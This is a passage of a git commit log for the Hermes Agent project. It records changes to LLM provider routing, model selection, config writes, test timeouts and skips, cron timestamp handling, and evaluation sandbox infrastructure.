- Update banner title to show 'Hermes Agent v0.1.0 (2026.3.12)' format
- Update cli.py banner to match new format
- Add scripts/release.py: full release automation tool
  - Generates categorized changelogs from git history
  - Maps git authors to GitHub @mentions (70+ contributors)
  - Supports dry-run preview and --publish mode
  - Creates annotated CalVer git tags + GitHub Releases
  - Bumps semver in source files automatically
  - Usage: python scripts/release.py --bump minor --publish
- Add .release_notes.md to .gitignore

Versioning scheme: CalVer tags (v2026.3.12) + SemVer display (v0.1.0)
2026-03-12 01:35:47 -07:00
teknium1
a37fc05171 fix: skip hanging tests + add global test timeout
4 test files spawn real processes or make live API calls that hang
indefinitely in batch/CI runs. Skip them with pytestmark:

- tests/tools/test_code_execution.py (subprocess spawns)
- tests/tools/test_file_tools_live.py (live LocalEnvironment)
- tests/test_413_compression.py (blocks on process)
- tests/test_agent_loop_tool_calling.py (live OpenRouter API calls)

Also added global 30s signal.alarm timeout in conftest.py as a safety
net, and removed stale nous-api test that hung on OAuth browser login.

Suite now runs in ~55s with no hangs.
2026-03-12 01:23:28 -07:00
teknium1
1956b9d97a fix: remove nous-api test + fix OAuth test index after nous-api removal
- Remove test_nous_api_setup_preserves_model_provider_metadata (nous-api
  provider no longer exists, test selected Nous OAuth which hangs waiting
  for browser login)
- Fix test_nous_oauth_setup prompt_choice index: 1→0 (Nous Portal is
  now first option after nous-api removal)
2026-03-12 00:51:30 -07:00
Teknium
9cb9d1a47a Merge pull request #1003 from NousResearch/hermes/hermes-cf9f7d54
feat: centralized provider router, call_llm API, unified /model command
2026-03-12 00:29:18 -07:00
teknium1
2192b17670 merge: resolve conflicts with origin/main
- gateway/run.py: Take main's _resolve_gateway_model() helper
- hermes_cli/setup.py: Re-apply nous-api removal after merge brought
  it back. Fix provider_idx offset (Custom is now index 3, not 4).
- tests/hermes_cli/test_setup.py: Fix custom setup test index (3→4)
2026-03-12 00:29:04 -07:00
teknium1
7febdf7208 fix: custom endpoint model validation + better /model error messages
- Custom endpoints can serve any model, so skip validation for
  provider='custom' in validate_requested_model(). Previously it
  would reject any model name since there's no static catalog or
  live API to check against.
- Show clear setup instructions when switching to custom endpoint
  without OPENAI_BASE_URL/OPENAI_API_KEY configured.
- Added curated model lists for Nous Portal and OpenAI Codex to
  _PROVIDER_MODELS so /model shows their available models.
2026-03-11 23:29:26 -07:00
teknium1
ec2c6dff70 feat: unified /model and /provider into single view
Both /model and /provider now show the same unified display:

  Current: anthropic/claude-opus-4.6 via OpenRouter

  Authenticated providers & models:
    [openrouter] ← active
      anthropic/claude-opus-4.6 ← current
      anthropic/claude-sonnet-4.5
      ...
    [nous]
      claude-opus-4-6
      gemini-3-flash
      ...
    [openai-codex]
      gpt-5.2-codex
      gpt-5.1-codex-mini
      ...

  Not configured: Z.AI / GLM, Kimi / Moonshot, ...

  Switch model:    /model <model-name>
  Switch provider: /model <provider>:<model-name>
  Example: /model nous:claude-opus-4-6

Users can see all authenticated providers and their models at a glance,
making it easy to switch mid-conversation.

Also added curated model lists for Nous Portal and OpenAI Codex to
hermes_cli/models.py.
2026-03-11 23:06:06 -07:00
teknium1
65356003e3 revert: keep provider preferences for all providers (Nous will proxy)
Nous Portal backend will become a transparent proxy for OpenRouter-
specific parameters (provider preferences, etc.), so keep sending them
to all providers. The reasoning disabled fix is kept (that's a real
constraint of the Nous endpoint).
2026-03-11 22:53:06 -07:00
teknium1
a7e5f19528 fix: don't send OpenRouter-specific provider preferences to Nous Portal
Two bugs in _build_api_kwargs that broke Nous Portal:

1. Provider preferences (only, ignore, order, sort) are OpenRouter-
   specific routing features. They were being sent in extra_body to ALL
   providers, including Nous Portal. When the config had
   providers_only=['google-vertex'], Nous Portal returned 404 'Inference
   host not found' because it doesn't have a google-vertex backend.

   Fix: Only include provider preferences when _is_openrouter is True.

2. Reasoning config with enabled=false was being sent to Nous Portal,
   which requires reasoning and returns 400 'Reasoning is mandatory for
   this endpoint and cannot be disabled.'

   Fix: Omit the reasoning parameter for Nous when enabled=false.

Root cause found via HERMES_DUMP_REQUESTS=1 which showed the exact
request payload being sent to Nous Portal's inference API.
2026-03-11 22:41:33 -07:00
teknium1
9302690e1b refactor: remove LLM_MODEL env var dependency — config.yaml is sole source of truth
Model selection now comes exclusively from config.yaml (set via
'hermes model' or 'hermes setup'). The LLM_MODEL env var is no longer
read or written anywhere in production code.

Why: env vars are per-process/per-user and would conflict in
multi-agent or multi-tenant setups. Config.yaml is file-based and
can be scoped per-user or eventually per-session.

Changes:
- cli.py: Read model from CLI_CONFIG only, not LLM_MODEL/OPENAI_MODEL
- hermes_cli/auth.py: _save_model_choice() no longer writes LLM_MODEL
  to .env
- hermes_cli/setup.py: Remove 12 save_env_value('LLM_MODEL', ...)
  calls from all provider setup flows
- gateway/run.py: Remove LLM_MODEL fallback (HERMES_MODEL still works
  for gateway process runtime)
- cron/scheduler.py: Same
- agent/auxiliary_client.py: Remove LLM_MODEL from custom endpoint
  model detection
2026-03-11 22:04:42 -07:00
teknium1
a29801286f refactor: route main agent client + fallback through centralized router
Phase 2 of the provider router migration — route the main agent's
client construction and fallback activation through
resolve_provider_client() instead of duplicated ad-hoc logic.

run_agent.py:
- __init__: When no explicit api_key/base_url, use
  resolve_provider_client(provider, raw_codex=True) for client
  construction. Explicit creds (from CLI/gateway runtime provider)
  still construct directly.
- _try_activate_fallback: Replace _resolve_fallback_credentials and
  its duplicated _FALLBACK_API_KEY_PROVIDERS / _FALLBACK_OAUTH_PROVIDERS
  dicts with a single resolve_provider_client() call. The router
  handles all provider types (API-key, OAuth, Codex) centrally.
- Remove _resolve_fallback_credentials method and both fallback dicts.

agent/auxiliary_client.py:
- Add raw_codex parameter to resolve_provider_client(). When True,
  returns the raw OpenAI client for Codex providers instead of wrapping
  in CodexAuxiliaryClient. The main agent needs this for direct
  responses.stream() access.

3251 passed, 2 pre-existing unrelated failures.
2026-03-11 21:38:29 -07:00
teknium1
29ef69c703 fix: update all test mocks for call_llm migration
Update 14 test files to use the new call_llm/async_call_llm mock
patterns instead of the old get_text_auxiliary_client/
get_vision_auxiliary_client tuple returns.

- vision_tools tests: mock async_call_llm instead of _aux_async_client
- browser tests: mock call_llm instead of _aux_vision_client
- flush_memories tests: mock call_llm instead of get_text_auxiliary_client
- session_search tests: mock async_call_llm with RuntimeError
- mcp_tool tests: fix whitelist model config, use side_effect for
  multi-response tests
- auxiliary_config_bridge: update for model=None (resolved in router)

3251 passed, 2 pre-existing unrelated failures.
2026-03-11 21:06:54 -07:00
teknium1
0aa31cd3cb feat: call_llm/async_call_llm + config slots + migrate all consumers
Add centralized call_llm() and async_call_llm() functions that own the
full LLM request lifecycle:
  1. Resolve provider + model from task config or explicit args
  2. Get or create a cached client for that provider
  3. Format request args (max_tokens handling, provider extra_body)
  4. Make the API call with max_tokens/max_completion_tokens retry
  5. Return the response

Config: expanded auxiliary section with provider:model slots for all
tasks (compression, vision, web_extract, session_search, skills_hub,
mcp, flush_memories). Config version bumped to 7.

Migrated all auxiliary consumers:
- context_compressor.py: uses call_llm(task='compression')
- vision_tools.py: uses async_call_llm(task='vision')
- web_tools.py: uses async_call_llm(task='web_extract')
- session_search_tool.py: uses async_call_llm(task='session_search')
- browser_tool.py: uses call_llm(task='vision'/'web_extract')
- mcp_tool.py: uses call_llm(task='mcp')
- skills_guard.py: uses call_llm(provider='openrouter')
- run_agent.py flush_memories: uses call_llm(task='flush_memories')

Tests updated for context_compressor and MCP tool. Some test mocks
still need updating (15 remaining failures from mock pattern changes,
2 pre-existing).
2026-03-11 20:52:19 -07:00
teknium1
013cc4d2fc chore: remove nous-api provider (API key path)
Nous Portal only supports OAuth authentication. Remove the 'nous-api'
provider which allowed direct API key access via NOUS_API_KEY env var.

Removed from:
- hermes_cli/auth.py: PROVIDER_REGISTRY entry + aliases
- hermes_cli/config.py: OPTIONAL_ENV_VARS entry
- hermes_cli/setup.py: setup wizard option + model selection handler
  (reindexed remaining provider choices)
- agent/auxiliary_client.py: docstring references
- tests/test_runtime_provider_resolution.py: nous-api test
- tests/integration/test_web_tools.py: renamed dict key
2026-03-11 20:14:44 -07:00
teknium1
07f09ecd83 refactor: route ad-hoc LLM consumers through centralized provider router
Route all remaining ad-hoc auxiliary LLM call sites through
resolve_provider_client() so auth, headers, and API format (Chat
Completions vs Responses API) are handled consistently in one place.

Files changed:

- tools/openrouter_client.py: Replace manual AsyncOpenAI construction
  with resolve_provider_client('openrouter', async_mode=True). The
  shared client module now delegates entirely to the router.

- tools/skills_guard.py: Replace inline OpenAI client construction
  (hardcoded OpenRouter base_url, manual api_key lookup, manual
  headers) with resolve_provider_client('openrouter'). Remove unused
  OPENROUTER_BASE_URL import.

- trajectory_compressor.py: Add _detect_provider() to map config
  base_url to a provider name, then route through
  resolve_provider_client. Falls back to raw construction for
  unrecognized custom endpoints.

- mini_swe_runner.py: Route default case (no explicit api_key/base_url)
  through resolve_provider_client('openrouter') with auto-detection
  fallback. Preserves direct construction when explicit creds are
  passed via CLI args.

- agent/auxiliary_client.py: Fix stale module docstring — vision auto
  mode now correctly documents that Codex and custom endpoints are
  tried (not skipped).
2026-03-11 20:02:36 -07:00
teknium1
8805e705a7 feat: centralized provider router + fix Codex vision bypass + vision error handling
Three interconnected fixes for auxiliary client infrastructure:

1. CENTRALIZED PROVIDER ROUTER (auxiliary_client.py)
   Add resolve_provider_client(provider, model, async_mode) — a single
   entry point for creating properly configured clients. Given a provider
   name and optional model, it handles auth lookup (env vars, OAuth
   tokens, auth.json), base URL resolution, provider-specific headers,
   and API format differences (Chat Completions vs Responses API for
   Codex). All auxiliary consumers should route through this instead of
   ad-hoc env var lookups.

   Refactored get_text_auxiliary_client, get_async_text_auxiliary_client,
   and get_vision_auxiliary_client to use the router internally.

2. FIX CODEX VISION BYPASS (vision_tools.py)
   vision_tools.py was constructing a raw AsyncOpenAI client from the
   sync vision client's api_key/base_url, completely bypassing the Codex
   Responses API adapter. When the vision provider resolved to Codex,
   the raw client would hit chatgpt.com/backend-api/codex with
   chat.completions.create() which only supports the Responses API.

   Fix: Added get_async_vision_auxiliary_client() which properly wraps
   Codex into AsyncCodexAuxiliaryClient. vision_tools.py now uses this
   instead of manual client construction.

3. FIX COMPRESSION FALLBACK + VISION ERROR HANDLING
   - context_compressor.py: Removed _get_fallback_client() which blindly
     looked for OPENAI_API_KEY + OPENAI_BASE_URL (fails for Codex OAuth,
     API-key providers, users without OPENAI_BASE_URL set). Replaced
     with fallback loop through resolve_provider_client() for each
     known provider, with same-provider dedup.

   - vision_tools.py: Added error detection for vision capability
     failures. Returns clear message to the model when the configured
     model doesn't support vision, instead of a generic error.

Addresses #886
2026-03-11 19:46:47 -07:00
Erosika
2d35016b94 fix(honcho): harden tool gating and migration peer routing
Prevent stale Honcho tool exposure in context/local modes, restore reliable async write retry behavior, and ensure SOUL.md migration uploads target the AI peer instead of the user peer. Also align Honcho CLI key checks with host-scoped apiKey resolution and lock the fixes with regression tests.

Made-with: Cursor
2026-03-11 18:21:27 -04:00
Erosika
8cddcfa0d8 docs(honcho): update config docs for host-scoped write convention
- Example config now shows hosts.hermes structure instead of flat root
- Config table split into root-level (shared) and host-level sections
- sessionStrategy default corrected to per-session
- Multi-host section expanded with two-tool example
- Note that existing root-level configs still work via fallback
2026-03-11 17:53:39 -04:00
Erosika
3c813535a7 fix(honcho): scope config writes to hosts.hermes, not root
Config writes from hermes honcho setup/peer now go to
hosts.hermes instead of mutating root-level keys. Root is
reserved for the user or honcho CLI. apiKey remains at root
as a shared credential.

Reads updated to check hosts.hermes first with root fallback
for all fields (peerName, enabled, saveMessages, environment,
sessionStrategy, sessionPeerPrefix).
2026-03-11 17:45:35 -04:00
kshitij
0712639441 test: verify reloaded config drives setup after migration 2026-03-12 02:56:36 +05:30
kshitij
4f427167ac chore: clean OpenClaw migration follow-up 2026-03-12 02:49:29 +05:30
teknium1
44bf859c3b feat: offer OpenClaw migration during first-time setup wizard
When a new user runs 'hermes setup' for the first time and ~/.openclaw/
exists, the wizard now asks if they want to import their OpenClaw data
before API/tool configuration begins.

If accepted, the existing migration script from optional-skills/ is
loaded dynamically and run with the 'full' preset — importing settings,
memories, skills, API keys, and platform configs. Config is reloaded
afterward so imported values (like API keys) are available for the
remaining setup steps.

The migration is only offered on first-time setup (not returning users)
and handles errors gracefully without blocking setup completion.

Closes #829
2026-03-12 02:40:00 +05:30
Erosika
d987ff54a1 fix: change session_strategy default from per-directory to per-session
Matches Hermes' native session naming (title if set, otherwise
session-scoped). Not a breaking change -- no memory data is lost,
old sessions remain in Honcho.
2026-03-11 15:42:35 -04:00
Erosika
a0b0dbe6b2 Merge remote-tracking branch 'origin/main' into feat/honcho-async-memory
Made-with: Cursor

# Conflicts:
#	cli.py
#	tests/test_run_agent.py
2026-03-11 12:22:56 -04:00
Teknium
8fa96debc9 Merge pull request #963 from NousResearch/hermes/hermes-cf9f7d54
fix: guard all print() against OSError with _SafeWriter
2026-03-11 09:19:52 -07:00
teknium1
a8409a161f fix: guard all print() calls against OSError with _SafeWriter
When hermes-agent runs as a systemd service, Docker container, or
headless daemon, the stdout pipe can become unavailable (idle timeout,
buffer exhaustion, socket reset). Any print() call then raises
OSError: [Errno 5] Input/output error, crashing run_conversation()
and causing cron jobs to fail.

Rather than wrapping individual print() calls (68 in run_conversation
alone), this adds a transparent _SafeWriter wrapper installed once at
the start of run_conversation(). It delegates all writes to the real
stdout and silently catches OSError. Zero overhead on the happy path,
comprehensive coverage of all print calls including future ones.

Fixes #845

Co-authored-by: J0hnLawMississippi <J0hnLawMississippi@users.noreply.github.com>
2026-03-11 09:19:10 -07:00
kshitij-eliza
452593319b fix(setup): preserve provider metadata during model selection 2026-03-11 09:17:09 -07:00
Teknium
73ba4987d5 Merge pull request #960 from NousResearch/hermes/hermes-20ea56c0
fix: add exc_info=True to image generation error logging
2026-03-11 09:16:30 -07:00
aydnOktay
41fa4fbaa5 fix: add exc_info=True to image generation error logging
Adds full stack traces to error logs in _upscale_image() and
image_generate_tool() for better debugging. Matches the pattern
used across the rest of the codebase.

Cherry-picked from PR #868 by aydnOktay.

Co-authored-by: aydnOktay <aydnOktay@users.noreply.github.com>
2026-03-11 09:15:45 -07:00
insecurejezza
11825ccefa feat(gateway): thread-aware free-response routing for Discord
- Forum parent channel IDs now match free-response list (add a forum
  channel ID and all its threads respond without mention)
- Better thread chat names: 'Guild / forum / thread' for forum threads
- Add discord.require_mention and discord.free_response_channels to
  config.yaml (bridged to env vars, env vars still override)
- Keep require_mention defaulting to true (safe for shared servers)

Cherry-picked from PR #867 by insecurejezza with default fix and
config.yaml integration.

Co-authored-by: insecurejezza <insecurejezza@users.noreply.github.com>
2026-03-11 09:15:31 -07:00
teknium1
91101065bb fix: improve git error logging in checkpoint manager
- Log command, return code, and stderr on non-zero exit
- Add exc_info=True to timeout, FileNotFoundError, and catch-all handlers
- Add debug field to restore() error responses with raw git output
- Keeps user-facing error messages clean while preserving detail for debugging

Inspired by PR #843 (aydnOktay).
2026-03-11 09:00:09 -07:00
teknium1
01bec40724 refactor(gateway): consolidate model resolution via _resolve_gateway_model()
Replace two inline copies of the env/config model resolution pattern
(in _run_agent_sync and _run_agent) with the _resolve_gateway_model()
helper introduced in PR #830.

Left untouched:
- Session hygiene block: different default (sonnet vs opus) + reads
  compression config from the same YAML load
- /model command: also reads provider from same config block
2026-03-11 08:59:17 -07:00
Teknium
9b58b9bced Merge pull request #955 from NousResearch/hermes/hermes-cf9f7d54
fix(vision): log error when vision client is unavailable + doctor MiniMax fix
2026-03-11 08:59:11 -07:00
teknium1
b66c8b409c fix(vision): log error when vision client is unavailable
Previously the early return for unconfigured vision model was silent.
Now logs an error so the failure is visible in logs for debugging.

Inspired by PR #839 by aydnOktay.

Co-authored-by: aydnOktay <aydnOktay@users.noreply.github.com>
2026-03-11 08:58:56 -07:00
Teknium
09b1de5f71 Merge pull request #954 from NousResearch/hermes/hermes-20ea56c0
fix(config): atomic write for .env to prevent API key loss on crash
2026-03-11 08:58:52 -07:00
alireza78a
3667138d05 fix(config): atomic write for .env to prevent API key loss on crash
save_env_value() used bare open('w') which truncates .env immediately.
A crash or OOM kill between truncation and completed write silently
wipes every credential in the file.

Write now goes to a temp file first, then os.replace() swaps it
atomically. Either the old .env exists or the new one does — never
a truncated half-write. Same pattern used in cron/jobs.py.

Cherry-picked from PR #842 by alireza78a, rebased onto current main
with conflict resolution (_secure_file refactor).

Co-authored-by: alireza78a <alireza78a@users.noreply.github.com>
2026-03-11 08:58:33 -07:00
Dev User
66c0b719de fix(gateway): pass model to temporary AIAgent instances
Memory flush, /compress, and session hygiene create AIAgent without
model=, falling back to the hardcoded default "anthropic/claude-opus-4.6".
This fails with a 400 error when the active provider is openai-codex
(Codex only accepts its own model names like gpt-5.1-codex-mini).

Add _resolve_gateway_model() that mirrors the env/config resolution
already used by _run_agent_sync, and wire it into all three temporary
agent creation sites.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-11 08:56:19 -07:00
Teknium
d905e612aa Merge pull request #950 from NousResearch/hermes/hermes-20ea56c0
docs: conditional skill activation — duckduckgo-search fallback + documentation
2026-03-11 08:48:40 -07:00
Teknium
fa7a18f42a Merge pull request #949 from NousResearch/hermes/hermes-b86fddbe
fix(cron): handle naive legacy timestamps in due-job checks
2026-03-11 08:47:10 -07:00
teknium1
82113f1f1e docs: conditional skill activation — tag duckduckgo-search as web fallback and add documentation
- Tag duckduckgo-search skill with fallback_for_toolsets: [web] so it
  auto-hides when Firecrawl is available and auto-shows when it isn't
- Add 'Conditional Activation' section to CONTRIBUTING.md with full
  spec, semantics, and examples for all 4 frontmatter fields
- Add 'Conditional Activation (Fallback Skills)' section to the user-
  facing skills docs with field reference table and practical example
- Update SKILL.md format examples in both docs to show the new fields

Follow-up to PR #785 (conditional skill activation feature).
2026-03-11 08:47:01 -07:00
Erosika
047b118299 fix(honcho): resolve review blockers for merge
Address merge-blocking review feedback by removing unsafe signal handler overrides, wiring next-turn Honcho prefetch, restoring per-directory session defaults, and exposing all Honcho tools to the model surface. Also harden prefetch cache access with public thread-safe accessors and remove duplicate browser cleanup code.

Made-with: Cursor
2026-03-11 11:46:37 -04:00
Teknium
01d3b31479 Merge PR #785: feat: conditional skill activation based on tool availability
Authored by teyrebaz33. Closes #539.

feat: conditional skill activation based on tool availability
2026-03-11 08:43:30 -07:00
teknium1
a5ffa1278c test(cron): add regression tests for _ensure_aware timezone conversion
Three new tests for the naive timestamp fix (PR #807):
- test_ensure_aware_naive_preserves_absolute_time: verifies UTC equivalent
  is preserved when interpreting naive datetimes as system-local time
- test_ensure_aware_normalizes_aware_to_hermes_tz: verifies already-aware
  datetimes are normalized to Hermes tz without shifting the instant
- test_ensure_aware_due_job_not_skipped_when_system_ahead: end-to-end
  regression test for the original bug scenario
2026-03-11 08:42:04 -07:00
Teknium
b7d58320a8 Merge pull request #947 from NousResearch/hermes/hermes-cf9f7d54
fix(doctor): skip /models health check for MiniMax providers
2026-03-11 08:41:29 -07:00
0xNyk
605ba4adea fix(cron): interpret naive timestamps as local time in due-job checks
Legacy cron job rows may store next_run_at without timezone info.
_ensure_aware() previously stamped the Hermes-configured tz directly
via replace(tzinfo=...), which shifts absolute time when system-local
tz differs from Hermes tz — causing overdue jobs to appear not due.

Now: naive datetimes are interpreted as system-local wall time first,
then converted to Hermes tz. Aware datetimes are normalized to Hermes
tz for consistency.

Cherry-picked from PR #807, rebased onto current main.
Fixes #806

Co-authored-by: 0xNyk <0xNyk@users.noreply.github.com>
2026-03-11 08:38:24 -07:00
Teknium
24a0c08d58 Merge pull request #796 from 0xbyt4/fix/discovery-failed-count
Clean bug fix — failed MCP server connections were silently swallowed, making failed_count dead code. Well-tested.
2026-03-11 08:32:32 -07:00
Bartok9
b4a100dfc0 fix(doctor): skip /models health check for MiniMax providers
MiniMax APIs (global and China) don't support /v1/models, causing
hermes doctor to always show HTTP 404 even with valid API keys.
Skip the HTTP check for these providers and show '(key configured)'
when the API key is present.

Cherry-picked from PR #822 by Bartok9, rebased onto current main.

Fixes #811

Co-authored-by: Bartok9 <259807879+Bartok9@users.noreply.github.com>
2026-03-11 08:29:35 -07:00
0xbyt4
4a8f23eddf fix: correctly track failed MCP server connections in discovery
_discover_one() caught all exceptions and returned [], making
asyncio.gather(return_exceptions=True) redundant. The
isinstance(result, Exception) branch in _discover_all() was dead
code, so failed_count was always 0. This caused:
- No summary printed when all servers fail (silent failure)
- ok_servers always equaling total_servers (misleading count)
- Unused variables transport_desc and transport_type

Fix: let exceptions propagate to gather() so failed_count increments
correctly. Move per-server failure logging to _discover_all(). Remove
dead variables.
2026-03-11 18:24:45 +03:00
teknium1
a54405e339 fix: proactive compression after large tool results + Anthropic error detection
Two fixes for context overflow handling:

1. Proactive compression after tool execution: The compression check now
   estimates the next prompt size using real token counts from the last API
   response (prompt_tokens + completion_tokens) plus a conservative estimate
   of newly appended tool results (chars // 3 for JSON-heavy content).
   Previously, should_compress() only checked last_prompt_tokens which
   didn't account for tool results — so a 130k prompt + 100k chars of tool
   output would pass the 140k threshold check but fail the 200k API limit.

2. Safety net: Added 'prompt is too long' to context-length error detection
   phrases. Anthropic returns 'prompt is too long: N tokens > M maximum'
   on HTTP 400, which wasn't matched by existing phrases. This ensures
   compression fires even if the proactive check underestimates.

Fixes #813
2026-03-11 08:04:52 -07:00
teknium1
efb780c754 Revert "fix: smart vision setup that respects the user's chosen provider"
This reverts commit c64efa9260.
2026-03-11 07:59:00 -07:00
teknium1
c64efa9260 fix: smart vision setup that respects the user's chosen provider
The old flow blindly asked for an OpenRouter API key after ANY non-OR
provider selection, even for Nous Portal and Codex which already
support vision natively. This was confusing and annoying.

New behavior:
- OpenRouter: skip — vision uses Gemini via their OR key
- Nous Portal OAuth: skip — vision uses Gemini via Nous
- OpenAI Codex: skip — gpt-5.3-codex supports vision
- Custom endpoint (api.openai.com): show OpenAI vision model picker
  (gpt-4o, gpt-4o-mini, gpt-4.1, etc.), saves AUXILIARY_VISION_MODEL
- Custom (other) / z.ai / kimi / minimax / nous-api:
  - First checks if existing OR/Nous creds already cover vision
  - If not, offers friendly choice: OpenRouter / OpenAI / Skip
  - No more 'enter OpenRouter key' thrown in your face

Also fixes the setup summary to check actual vision availability
across all providers instead of hardcoding 'requires OPENROUTER_API_KEY'.
MoA still correctly requires OpenRouter (calls multiple frontier models).
2026-03-11 07:48:44 -07:00
teknium1
43cb35cb21 docs: list individual config commands first, then hermes setup as all-in-one
Show users the specific commands for each config area (hermes model,
hermes tools, hermes config set, hermes gateway setup) and then
present 'hermes setup' as the option to configure everything at once.
2026-03-11 07:30:28 -07:00
teknium1
db496180db docs: remove hermes setup from install flow, point to hermes model/tools instead
The installer already handles full setup (provider config, etc.), so
telling users to run 'hermes setup' post-install is redundant and
confusing. Updated all docs to reflect the correct flow:

1. Run the installer (handles everything including provider setup)
2. Use 'hermes model', 'hermes tools', 'hermes gateway setup' to
   reconfigure individual settings later

Files updated:
- README.md: removed setup from quick install & getting started
- installation.md: updated post-install, manual step 9, troubleshooting
- quickstart.md: updated provider section & quick reference table
- cli-commands.md: updated hermes setup description
- faq.md: replaced hermes setup references with specific commands
2026-03-11 07:28:05 -07:00
Teknium
c69adfbb17 Merge pull request #825 from JackTheGit/fix/docs-typos-batch2
Fix several documentation typos
2026-03-11 07:13:24 -07:00
teknium1
683c8b24d4 fix: reduce max_retries to 3 and make ValueError/TypeError non-retryable
- max_retries reduced from 6 to 3 — 6 retries with exponential backoff
  could stall for ~275s total on persistent errors
- ValueError and TypeError now detected as non-retryable client errors
  and abort immediately instead of being retried with backoff (these are
  local validation/programming errors that will never succeed on retry)
2026-03-11 07:04:46 -07:00
teknium1
d2dee43825 fix: allow tool_choice, parallel_tool_calls, prompt_cache_key in codex preflight
_preflight_codex_api_kwargs rejected these three fields as unsupported,
but _build_api_kwargs adds them to every codex request. This caused a
ValueError before _interruptible_api_call was reached, which was caught
by the retry loop and retried with exponential backoff — appearing as
an infinite hang in tests (275s total backoff across 6 retries).

The fix adds these keys to allowed_keys and passes them through to the
normalized request dict.

This fixes the hanging test_cron_run_job_codex_path_handles_internal_401_refresh
test (now passes in 2.6s instead of timing out).
2026-03-11 07:00:14 -07:00
dmahan93
59b53f0a23 fix: skip tests when atroposlib/minisweagent unavailable in CI
- test_agent_loop_tool_calling.py: import atroposlib at module level
  to trigger skip (environments.agent_loop is now importable without
  atroposlib due to __init__.py graceful fallback)
- test_modal_sandbox_fixes.py: skip TestToolResolution tests when
  minisweagent not installed
2026-03-11 06:52:55 -07:00
dmahan93
d198a647e2 fix: guard all atroposlib imports for CI without atropos installed
- environments/__init__.py: try/except on atroposlib imports so
  submodules like tool_call_parsers remain importable standalone
- test_agent_loop.py, test_tool_call_parsers.py,
  test_managed_server_tool_support.py: skip at module level when
  atroposlib is missing
2026-03-11 06:52:55 -07:00
dmahan93
0f53275169 test: skip atropos-dependent tests when atroposlib not installed
Guard all test files that import from environments/ or atroposlib
with try/except + pytest.skip(allow_module_level=True) so they
gracefully skip instead of crashing when deps aren't available.
2026-03-11 06:52:55 -07:00
dmahan93
366de72a38 add a local vllm instance 2026-03-11 06:52:55 -07:00
dmahan93
13f5459670 fix: use ManagedServer for vLLM in TBLite eval + local_vllm config
TBLite eval was bypassing ManagedServer and calling ServerManager
directly, which uses /v1/chat/completions — not available on the
atropos vllm_api_server (/generate only).

Now uses _use_managed_server() to detect vLLM/SGLang backends and
route through ManagedServer (Phase 2) with proper tool_parser and
/generate endpoint. Falls back to Phase 1 for OpenAI endpoints.

Also adds local_vllm.yaml config for running against a local vLLM
server with Docker sandboxes.
2026-03-11 06:52:55 -07:00
dmahan93
93333387d6 fix: handle dict and object tool_calls in agent loop
vLLM's ToolCallTranslator returns tool_calls as dicts, while
OpenAI API returns them as objects with .id, .function.name etc.
Normalize both formats in the agent loop.
2026-03-11 06:52:26 -07:00
dmahan93
1f9e7cd659 test: 5 vLLM integration tests + fallback tool call parser
Tests hit a real vLLM server (Qwen/Qwen3-4B-Thinking-2507) via
ManagedServer Phase 2. Auto-skip if server isn't running.

Tests verify:
- Single tool call through full agent loop
- Multi-tool calls across turns
- ManagedServer produces SequenceNodes with tokens/logprobs
- Direct response without tools
- Thinking model produces <think> blocks

Also adds fallback parser in agent_loop.py: when ManagedServer's
ToolCallTranslator can't parse (vLLM not installed), hermes-agent's
standalone parsers extract <tool_call> tags from raw content.
2026-03-11 06:52:26 -07:00
dmahan93
09fc64c6b6 add eval output to gitignore 2026-03-11 06:52:26 -07:00
dmahan93
84147f4d81 refactor: update to new atropos tool-calling API
Migrate from old tool_call_parser (instance) to new ToolCallTranslator
pattern from atropos add-openai-endpoint-for-managed-server branch:

- Set tool_parser on ServerManager (string name, e.g. 'hermes')
- Use managed_server(tokenizer=..., preserve_think_blocks=...)
  instead of managed_server(tokenizer=..., tool_call_parser=instance)
- ManagedServer now handles tool call translation internally via
  ToolCallTranslator (bidirectional raw text <-> OpenAI tool_calls)
- Remove old parser loading code (get_parser/KeyError fallback)

The hermes-agent tool_call_parsers/ directory is preserved as a
standalone fallback for environments that don't use vLLM's parsers.
2026-03-11 06:52:26 -07:00
dmahan93
ee4b20b55b test: 9 agent loop tool-calling integration tests
Real LLM calls via OpenRouter using stepfun/step-3.5-flash:free (zero cost).
Falls back to paid models if free model is unavailable.

Tests: single tool call, multi-tool single turn, multi-turn chains,
unknown tool rejection, max_turns limit, direct response (no tools),
tool error handling, AgentResult structure, conversation history.
2026-03-11 06:52:26 -07:00
dmahan93
ed27b826c5 feat: add eval_concurrency limit + Docker local config for TBLite
- Add eval_concurrency config field with asyncio.Semaphore
- Add local.yaml config using Docker backend (sandboxed, no cloud costs)
- Register docker_image alongside modal_image for backend flexibility
- Default: 8 parallel tasks for local runs
2026-03-11 06:52:26 -07:00
dmahan93
b03aefaf20 test: 13 tests for Modal sandbox infra fixes 2026-03-11 06:51:42 -07:00
dmahan93
d7f4db53f5 fix: Modal sandbox eval infra (9 fixes for TBLite baseline)
Fixes discovered while running TBLite baseline evaluation:

1. ephemeral_disk param not supported in modal 1.3.5 - check before passing
2. Modal legacy image builder requires working pip - add ensurepip fix via
   setup_dockerfile_commands to handle task images with broken pip
3. Host cwd leaked into Modal sandbox - add /home/ to host prefix check
4. Tilde ~ not expanded by subprocess.run(cwd=) in sandboxes - use /root
5. install_pipx must stay True for swerex-remote to be available

Dependencies also needed (not in this commit):
- git submodule update --init mini-swe-agent
- uv pip install swe-rex boto3
2026-03-11 06:51:42 -07:00
dmahan93
2c97bf3936 Add tests for atropos tool calling integration
- test_tool_call_parsers.py: 16 tests for parser registry, hermes parser
  (single/multiple/truncated/malformed), and ParseResult contract validation
- test_agent_loop.py: 21 tests for HermesAgentLoop with mock servers
  (text responses, tool calls, max turns, unknown tools, API errors,
  extra_body forwarding, managed state, blocked tools, reasoning extraction)
- test_managed_server_tool_support.py: 9 tests validating API compatibility
  between hermes-agent and atroposlib's ManagedServer tool_call_parser support
  (gracefully skips on baseline atroposlib, passes on tool_call_support branch)
2026-03-11 06:51:26 -07:00
teknium1
1dfa544250 Merge PR #802: test: parallelize test suite with pytest-xdist
Adds pytest-xdist to dev dependencies and -n auto to default pytest addopts
for parallel test execution across CPU cores.

Authored by OutThisLife.

Co-authored-by: OutThisLife <OutThisLife@users.noreply.github.com>
2026-03-11 06:43:00 -07:00
teknium1
eac5f8f40f fix: wire email platform into toolset mappings + add documentation
Post-merge fixes for the email gateway (PR #797):

1. Add Platform.EMAIL to all 4 platform-to-toolset/config mapping
   dicts in gateway/run.py. Without this, email sessions silently
   fell back to the Telegram toolset because these dicts were added
   after the PR branched off main.

2. Add email (and signal) to hermes_cli/tools_config.py and
